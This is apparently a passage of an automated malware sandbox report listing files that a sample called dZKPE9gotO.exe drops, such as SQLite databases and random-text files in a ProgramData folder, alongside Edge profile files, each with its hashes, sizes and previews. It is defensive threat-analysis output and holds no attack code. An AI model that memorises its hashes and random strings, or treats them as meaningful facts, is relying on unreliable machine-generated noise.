                                                                                                                                                                                                                                                Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\OPHDT2

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                Entropy (8bit):1.265218452828871
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMCSAELyKOMq+8HKkjucswRv8p3nVumH:K0q+n0JC9ELyKOMq+8HKkjuczRv89D
                                                                                                                                                                                                                                                MD5:7C249851A2911B3A022EAC881865A7B5
                                                                                                                                                                                                                                                SHA1:CAF47563F78974C64F0F7265F3647C199B1AD8A5
                                                                                                                                                                                                                                                SHA-256:77B59D9F995AC8D2674E3CF9799A069AB6DBFEA8AD431D06CF1820946F0C767D
                                                                                                                                                                                                                                                SHA-512:DD78A3338802BEB75F4AABC0F216612E03E69C29C0FB1A7E69AF1C7ACBB7DA50E81BFDF4B3A5967D5A7536BFC95665CEDB633ECF2E2E3BB27CBE9BBDDD2FCFDB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\OZUAIM

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):294912
                                                                                                                                                                                                                                                Entropy (8bit):0.08441928760034874
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
                                                                                                                                                                                                                                                MD5:2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
                                                                                                                                                                                                                                                SHA1:14DFBE9B28D033542357D98005239D842A16FCFD
                                                                                                                                                                                                                                                SHA-256:91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
                                                                                                                                                                                                                                                SHA-512:DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\SJMO89RQI

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\TJMOPH

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                                MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                                SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                                SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                                SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\V3WLNO

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\VAIM7G

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):155648
                                                                                                                                                                                                                                                Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\VKXB16

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                Entropy (8bit):1.137181696973627
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                                                                                                                MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                                                                                                                SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                                                                                                                SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                                                                                                                SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\X4WBI5

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.694574194309462
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                                                                                                                MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                                                                                                                SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                                                                                                                SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                                                                                                                SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                                                                                                                C:\ProgramData\PP89HLXLFCBI\Y5X47Q

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.691266297898928
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                                                                                                                                                                MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                                                                                                                                                                SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                                                                                                                                                                SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                                                                                                                                                                SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0ffd9855-8e89-4639-8217-1cba37b719b7.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):44719
                                                                                                                                                                                                                                                Entropy (8bit):6.0947557576497475
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kt9KKGf4oD0IUFWtIPN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynpN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:F3A64342532823E00D591D512BDFAC72
                                                                                                                                                                                                                                                SHA1:8F80A5D88718C677B8720C5E566A0C6B9B7A1B33
                                                                                                                                                                                                                                                SHA-256:308EFBE1D33372B4C9BBA1FF56CED2AC5D4A8CEC1649420105F0FD83BDC1361C
                                                                                                                                                                                                                                                SHA-512:5D16C3C975ABF54A95AAC9481DAF30BEF5A6E8D45FF84F6811F82706DC86721DF791527ED8F9D9400737A975EA917F85B73202D78337BD2542291F846EB6D54C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\42e762cb-af64-49ca-b5bd-578ea7981012.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44719
                                                                                                                                                                                                                                                Entropy (8bit):6.0947557576497475
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kt9KKGf4oD0IUFWtIPN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynpN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:F3A64342532823E00D591D512BDFAC72
                                                                                                                                                                                                                                                SHA1:8F80A5D88718C677B8720C5E566A0C6B9B7A1B33
                                                                                                                                                                                                                                                SHA-256:308EFBE1D33372B4C9BBA1FF56CED2AC5D4A8CEC1649420105F0FD83BDC1361C
                                                                                                                                                                                                                                                SHA-512:5D16C3C975ABF54A95AAC9481DAF30BEF5A6E8D45FF84F6811F82706DC86721DF791527ED8F9D9400737A975EA917F85B73202D78337BD2542291F846EB6D54C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\47364516-407c-4763-9d7d-d956bf63bec3.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44797
                                                                                                                                                                                                                                                Entropy (8bit):6.095239141032858
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xt9KKGf4oBauetCPjN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yOAN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:389A24370C86D5CB53BE24B94052BA65
                                                                                                                                                                                                                                                SHA1:2EA921B8A000B8A7D434068D3080391252A788DE
                                                                                                                                                                                                                                                SHA-256:185E200F78AAD00265A3C6E936E4166B82A30F0C7D732C4B893F7F23488182A9
                                                                                                                                                                                                                                                SHA-512:5A1085B2308FBF8A43393DC16CB2052B892A3FCA6B7DD19103ED639EEC4090C16B47775BA8A6C8731E939279C50FAA258BBBB0BF7A9F1A1F996AF1E24BBB769D
                                                                                                                                                                                                                                                Malicious:false
